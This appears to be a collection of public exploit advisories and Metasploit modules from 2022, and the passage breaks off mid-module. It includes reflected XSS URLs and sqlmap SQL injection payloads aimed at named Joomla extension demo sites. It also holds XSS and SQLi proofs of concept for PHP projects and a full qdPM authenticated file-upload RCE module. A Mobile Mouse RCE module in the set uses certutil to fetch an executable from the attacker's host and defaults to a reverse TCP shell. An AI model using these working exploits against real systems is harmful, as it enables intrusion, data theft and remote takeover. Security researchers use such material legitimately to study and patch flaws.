<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : softPHP │<br />│ Software : jCart for OpenCart 3.0.3.19 - Reflected XSS │<br />│ jCart is a standalone Joomla ecommerce component which includes OpenCart │<br />│ features │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'Itemid' is vulnerable to XSS<br /><br />http://demos.soft-php.com/jcart/index.php?option=com_jcart&Itemid=1091712';confirm(1)//274&route=product/search<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : JoomBoost │<br />│ Software : JoomRecipe 4.2.2 Extension for Joomla - Reflected XSS │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'withIngredients%5B%5D' is vulnerable to XSS<br /><br />https://joomrecipe-demo.joomboost.com/search-recipes/search/results.html?searchPerformed=1&&withIngredients%5B%5D=hpf5w"><script>alert(1)</script>u7d68fi0pz1<br /><br />GET parameter 'withoutIngredients%5B%5D' is vulnerable to XSS<br /><br />https://joomrecipe-demo.joomboost.com/search-recipes/search/results.html?searchPerformed=1&withoutIngredients%5B%5D=ucc8c"><script>alert(1)</script>lylajy83wro<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::PhpEXE<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)',<br /> 'Description' => %q{<br /> A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier.<br /> An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal<br /> vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection.<br /> NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Rishal Dwivedi (Loginsoft)', # Discovery<br /> 'Leon Trappett (thepcn3rd)', # PoC<br /> 'Giacomo Casoni' # Metasploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2020-7246'],<br /> ['EDB', '50175']<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x00"<br /> },<br /> 'DefaultOptions' => {<br /> 'EXITFUNC' => 'thread'<br /> },<br /> 'Platform' => %w[linux php],<br /> 'Targets' => [<br /> [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],<br /> [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],<br /> [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],<br /> [ 'Windows x86', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],<br /> [ 'Windows x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ]<br /> ],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2020-11-21',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => ['CRASH_SAFE'],<br /> 'Reliability' => ['IOC_IN_LOGS'],<br /> 'SideEffects' => ['REPEATABLE_SESSION']<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base directory where qdPM resides', '/']),<br /> OptString.new('EMAIL', [true, 'The email to login with']),<br /> OptString.new('PASSWORD', [true, 'The password to login with'])<br /> ]<br /> )<br /><br /> self.needs_cleanup = true<br /> end<br /><br /> def check<br /> uri = normalize_uri(uri, '/index.php')<br /> res = send_request_raw({ 'uri' => uri })<br /> if res.nil?<br /> return Exploit::CheckCode::Unknown<br /> end<br /><br /> login_page = res.get_html_document<br /> begin<br /> version_num = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f<br /> rescue StandardError<br /> return Exploit::CheckCode::Unknown<br /> end<br /> version = Rex::Version.new(version_num)<br /> if version <= Rex::Version.new('9.1')<br /> return Exploit::CheckCode::Appears<br /> else<br /> return Exploit::CheckCode::Safe<br /> end<br /> end<br /><br /> def get_write_exec_payload_win(fname, _data)<br /> p = Rex::Text.encode_base64(generate_payload_exe)<br /> php = %|<br /> <?php<br /> $f = fopen("#{fname}", "wb");<br /> fwrite($f, base64_decode("#{p}"));<br /> fclose($f);<br /> exec("C:\\Windows\\System32\\cmd.exe /c #{fname}");<br /> ?><br /> |<br /> php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')<br /> return php<br /> end<br /><br /> def login(base, username, password)<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri("#{base}/index.php/login"),<br /> 'keep_cookies' => true<br /> })<br /> login_page = res.get_html_document<br /> csrf_token = login_page.at("input[name='login[_csrf_token]']/@value")<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri("#{base}/index.php/login"),<br /> 'vars_post' => {<br /> 'login[email]' => username,<br /> 'login[password]' => password,<br /> 'login[_csrf_token]' => csrf_token<br /> },<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => "http://#{rhost}",<br /> 'Referer' => "http://#{rhost}/#{base}/index.php/login"<br /> }<br /> })<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri("#{base}/index.php/myAccount"),<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Host' => rhost.to_s<br /> }<br /> })<br /> account_page = res.get_html_document<br /> begin<br /> userid = account_page.at("input[@name='users[id]']/@value").text.strip<br /> rescue StandardError<br /> print_error('The designated admin account does not have a user ID.')<br /> return {}<br /> end<br /> username = account_page.at("input[@name='users[name]']/@value").text.strip<br /> csrftoken_ = account_page.at("input[@name='users[_csrf_token]']/@value").text.strip<br /> opts = {<br /> 'user_id' => userid,<br /> 'name' => username,<br /> 'csrf_token' => csrftoken_<br /> }<br /> return opts<br /> end<br /><br /> def upload_php(base, opts)<br /> fname = opts['filename']<br /> php_payload = opts['data']<br /> user_id = opts['user_id']<br /> email = opts['email']<br /> csrf_token = opts['csrf_token']<br /><br /> data = [<br /> { 'name' => 'sf_method', 'data' => 'put' },<br /> { 'name' => 'users[id]', 'data' => user_id },<br /> { 'name' => 'users[photo_preview]', 'data' => '.htaccess' },<br /> { 'name' => 'users[_csrf_token]', 'data' => csrf_token },<br /> { 'name' => 'users[new_password]', 'data' => '' },<br /> { 'name' => 'users[email]', 'data' => email },<br /> { 'name' => 'extra_fields[9]', 'data' => '' },<br /> { 'name' => 'users[remove_photo]', 'data' => '1' }<br /> ]<br /><br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri("#{base}/index.php/myAccount/update"),<br /> 'vars_form_data' => data,<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => "http://#{rhost}",<br /> 'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"<br /> }<br /> )<br /><br /> data = [<br /> { 'name' => 'sf_method', 'data' => 'put' },<br /> { 'name' => 'users[id]', 'data' => user_id },<br /> { 'name' => 'users[photo_preview]', 'data' => '../.htaccess' },<br /> { 'name' => 'users[_csrf_token]', 'data' => csrf_token },<br /> { 'name' => 'users[new_password]', 'data' => '' },<br /> { 'name' => 'users[email]', 'data' => email },<br /> { 'name' => 'extra_fields[9]', 'data' => '' },<br /> { 'name' => 'users[remove_photo]', 'data' => '1' }<br /> ]<br /><br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri("#{base}/index.php/myAccount/update"),<br /> 'vars_form_data' => data,<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => "http://#{rhost}",<br /> 'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"<br /> }<br /> )<br /><br /> data = [<br /> { 'name' => 'sf_method', 'data' => 'put' },<br /> { 'name' => 'users[id]', 'data' => user_id },<br /> { 'name' => 'users[_csrf_token]', 'data' => csrf_token },<br /> { 'name' => 'users[new_password]', 'data' => '' },<br /> { 'name' => 'users[email]', 'data' => email },<br /> { 'name' => 'extra_fields[9]', 'data' => '' },<br /> { 'name' => 'users[remove_photo]', 'data' => '1' },<br /> { 'name' => 'users[photo]', 'data' => php_payload, 'mime_type' => 'application/octet-stream', 'filename' => fname }<br /> ]<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri("#{base}/index.php/myAccount/update"),<br /> 'vars_form_data' => data,<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => "http://#{rhost}",<br /> 'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"<br /> }<br /> })<br /><br /> return res.code == 302<br /> end<br /><br /> def exec_php(base, _opts)<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri("#{base}/index.php/myAccount"),<br /> 'keep_cookies' => true<br /> })<br /> home_page = res.get_html_document<br /> backdoor = home_page.at("//input[@name='users[photo_preview]']/@value").text.strip<br /> register_file_for_cleanup(backdoor)<br /> send_request_cgi({<br /> 'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}")<br /> })<br /> end<br /><br /> def exploit<br /> uri = normalize_uri(target_uri.path)<br /> user = datastore['EMAIL']<br /> pass = datastore['PASSWORD']<br /> print_status("Attempt to login with '#{user}:#{pass}'")<br /> opts = login(uri, user, pass)<br /> if opts.empty?<br /> print_error('Login unsuccessful or bad (admin) user')<br /> return<br /> end<br /><br /> php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"<br /> case target['Platform']<br /> when 'php'<br /> p = get_write_exec_payload<br /> when 'linux'<br /> p = get_write_exec_payload(unlink_self: true)<br /> when 'win'<br /> bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"<br /> bin = generate_payload_exe<br /> p = get_write_exec_payload_win(bin_name.to_s, bin)<br /> print_warning("#{bin_name} will require manual cleanup")<br /> end<br /><br /> print_status("Uploading PHP payload (#{p.length} bytes)...")<br /> data = {<br /> 'email' => user.to_s,<br /> 'filename' => php_fname,<br /> 'data' => p<br /> }<br /> data = data.merge(opts)<br /> uploader = upload_php(uri, data)<br /> if !uploader<br /> print_error('Unable to upload')<br /> return<br /> end<br /><br /> print_status("Executing '#{php_fname}'")<br /> exec_php(uri, opts)<br /> end<br />end<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : JULOA │<br />│ Software : AdsManager 3.2.0 Extension for Joomla │<br />│ Vuln Type: SQL Injection │<br />│ Method : POST │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />POST parameter 'ad_vectormap' is vulnerable<br /><br />---<br />Parameter: ad_vectormap (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') RLIKE (SELECT (CASE WHEN (8892=8892) THEN '' ELSE 0x28 END))-- TnXM&advsearch=0&new_search=1<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 2373 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2373=2373,1))),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- lAQM&advsearch=0&new_search=1<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 4095 FROM (SELECT(SLEEP(5)))TLzG)-- UmxX&advsearch=0&new_search=1<br />---<br /><br /><br />[+] Starting the Attack<br /><br /><br />[INFO] fetching current database<br /><br />the back-end DBMS is MySQL<br />web application technology: PHP 7.4.30, Nginx<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br /><br />current database: 'c1demosource'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS)<br /># Date: 2022-07-02<br /># Exploit Author: Ali Alipour<br /># Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql<br /># Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip<br /># Version: 1.0<br /># Tested on: Windows 10 Pro x64 - XAMPP Server<br /># CVE : N/A<br /><br /><br />#Issue Detail:<br /><br />The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.<br /><br />This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.<br /><br /># Vulnerable page: /buspassms/download-pass.php<br /><br /># Vulnerable Parameter: searchdata [ POST Data ]<br /><br />#Request : <br /><br />POST /buspassms/download-pass.php HTTP/1.1<br />Host: 127.0.0.1<br />Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3<br />Origin: https://127.0.0.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />Referer: https://127.0.0.1/buspassms/download-pass.php<br />Content-Type: application/x-www-form-urlencoded<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Content-Length: 25<br /><br />searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=<br /><br /><br /><br />#Response : <br /><br />HTTP/1.1 200 OK<br />Date: Fri, 01 Jul 2022 00:14:25 GMT<br />Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8<br />X-Powered-By: PHP/7.4.8<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 6425<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /><title>Bus Pass Management System || Pass Page</title><br /><br /><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba<br />...[SNIP]...<br /><h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4><br />...[SNIP]...<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Online Examination System - SQL Injection<br /># Google Dork: N/A<br /># Date: 2022-9-28<br /># Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11<br /># Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/<br /># Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip<br /># Tested on: windows 11 - XAMPP<br /># CVE : N/A<br /># Version: 1.0<br /><br />Vulnerability Details<br />======================<br /><br />Steps :<br /><br />vulnerable code in file account.php<br /><br /><?php<br />if(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {<br />$eid=@$_GET['eid'];<br />$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );<br />echo '<div class="panel" style="margin:5%">';<br />while($row=mysqli_fetch_array($q) )<br />?><br /><br />1) Log in to the application after register new user<br /><br />inject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Ossolution Team │<br />│ Software : EDocman 1.23.3 Extension for Joomla - Reflected XSS │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'filter_search' is vulnerable to XSS<br /><br />Path: index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=[XSS]<br /><br />https://joomdonationdemo.com/edocman/index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=ekmj6"onfocus="alert(1)"autofocus="fjozn<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Online Examination System - Cross site scripting Reflected<br /># Google Dork: N/A<br /># Date: 2022-9-29<br /># Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11<br /># Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/<br /># Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip<br /># Tested on: windows 11 - XAMPP<br /># CVE : N/A<br /># Version: 1.0<br /><br />Vulnerability Details<br />======================<br /><br />Steps :<br /><br />vulnerable code in file index.php<br /><br />157 <?php if(@$_GET['q7'])<br />158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?><br /><br />http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3E<br /><br />inject payload parameter q7<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> include Exploit::Remote::Tcp<br /> include Exploit::EXE # generate_payload_exe<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Mobile Mouse RCE',<br /> 'Description' => %q{<br /> This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol<br /> to deploy a payload and run it from the server. This module will only deploy<br /> a payload if the server is set without a password (default).<br /> Tested against 3.6.0.4, current at the time of module writing<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'CHOKRI HAMMEDI' # edb<br /> ],<br /> 'References' => [<br /> [ 'EDB', '51010' ],<br /> [ 'URL', 'https://mobilemouse.com/' ],<br /> ],<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Platform' => 'win',<br /> 'Stance' => Msf::Exploit::Stance::Aggressive,<br /> 'Targets' => [<br /> ['default', {}],<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x04\x1E"<br /> },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/shell/reverse_tcp'<br /> },<br /> 'DisclosureDate' => '2022-09-20',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK] # typing on screen<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptPort.new('RPORT', [true, 'Port Mobile Mouse runs on', 9099]),<br /> OptInt.new('SLEEP', [true, 'How long to sleep between commands', 3]),<br /> OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),<br /> OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),<br /> ]<br /> )<br /> end<br /><br /> def path<br /> return datastore['PATH'] if datastore['PATH'].end_with? '\\'<br /><br /> "#{datastore['PATH']}\\"<br /> end<br /><br /> def connect_command<br /> connect_command = 'CONNECT' # 434F4E4E454354<br /> connect_command << "\x1E\x1E"<br /> connect_command << @client_name<br /> connect_command << "\x1E"<br /> connect_command << 'iPhone' # 6950686F6E65<br /> connect_command << "\x1E"<br /> # the next 2,2 may be a version number of some sort<br /> connect_command << '2' # 32<br /> connect_command << "\x1E"<br /> connect_command << '2' # 32<br /> connect_command << "\x1E\x04"<br /> sock.put(connect_command)<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def open_command_prompt<br /> open_command_prompt = 'KEY' # 4b4559<br /> open_command_prompt << "\x1E"<br /> open_command_prompt << '114' # 313134 windows key?<br /> open_command_prompt << "\x1E"<br /> open_command_prompt << 'r' # 72<br /> open_command_prompt << "\x1E"<br /> open_command_prompt << 'OPT' # 4f5054<br /> open_command_prompt << "\x04"<br /> sock.put(open_command_prompt)<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def script_content(payload)<br /> script_content = 'KEY' # 4B4559<br /> script_content << "\x1E"<br /> script_content << '100' # 313030<br /> script_content << "\x1E"<br /> script_content << payload<br /> script_content << "\x1E\x04"<br /> script_content << 'KEY' # 4B4559<br /> script_content << "\x1E"<br /> script_content << '-1' # 2d31<br /> script_content << "\x1E"<br /> script_content << 'ENTER' # 454e544552<br /> script_content << "\x1E\x04"<br /> sock.put(script_content)<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def on_request_uri(cli, _req)<br /> p = generate_payload_exe<br /> send_response(cli, p)<br /> print_good("Payload request received, sending #{p.length} bytes of payload for staging")<br /> end<br /><br /> def check<br /> if datastore['CLIENTNAME'].blank?<br /> @client_name = Rex::Text.rand_text_alphanumeric(5..10).to_s<br /> print_status("Client name set to: #{@client_name}")<br /> else<br /> @client_name = datastore['CLIENTNAME']<br /> end<br /><br /> connect<br /><br /> print_status('Connecting')<br /> connect_command<br /> res = sock.get_once<br /> if res.nil?<br /> return CheckCode::Unknown('No response received from target')<br /> end<br /><br /> disconnect<br /><br /> res = res.split("\x1E")<br /> if res[1] == 'NO'<br /> return CheckCode::Safe("Unable to connect, server response: #{res[4]}")<br /> end<br /><br /> CheckCode::Appears("Connected to hostname #{res[3]} with MAC address #{res[5]}")<br /> end<br /><br /> def exploit<br /> if datastore['CLIENTNAME'].blank?<br /> @client_name = Rex::Text.rand_text_alphanumeric(5..10).to_s<br /> print_status("Client name set to: #{@client_name}")<br /> else<br /> @client_name = datastore['CLIENTNAME']<br /> end<br /><br /> connect<br /><br /> print_status('Connecting')<br /> connect_command<br /> res = sock.get_once<br /> if res.nil?<br /> fail_with(Failure::Disconnected, 'No response received from target')<br /> end<br /><br /> res = res.split("\x1E")<br /> if res[1] == 'NO'<br /> fail_with(Failure::NoAccess, "Unable to connect, server response: #{res[4]}")<br /> end<br /> vprint_good("Connected to hostname #{res[3]} with MAC address #{res[5]}")<br /><br /> print_status('Opening Command Prompt')<br /> open_command_prompt<br /> # for whatever reason, if we don't read here the server doesn't want to keep playing with us, so read but throw away<br /> sock.get_once<br /><br /> print_status('Sending stager')<br /> filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'<br /> register_file_for_cleanup("#{path}#{filename}")<br /> # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2<br /> stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"<br /> start_service('Path' => '/') # start webserver<br /> script_content(stager)<br /><br /> print_status('Opening Command Prompt again')<br /> open_command_prompt<br /> print_status('Executing payload')<br /> script_content("#{path}#{filename} && exit")<br /><br /> handler<br /> disconnect<br /> sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert<br /> end<br />end<br /></code></pre>
<pre><code># frozen_string_literal: true<br /><br />##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GreatRanking<br /> include Msf::Post::Common<br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::System<br /> include Msf::Post::Linux::Kernel<br /> include Msf::Post::Linux::Compile<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Netfilter nft_set_elem_init Heap Overflow Privilege Escalation',<br /> 'Description' => %q{<br /> An issue was discovered in the Linux kernel through 5.18.9.<br /> A type confusion bug in nft_set_elem_init (leading to a buffer overflow)<br /> could be used by a local attacker to escalate 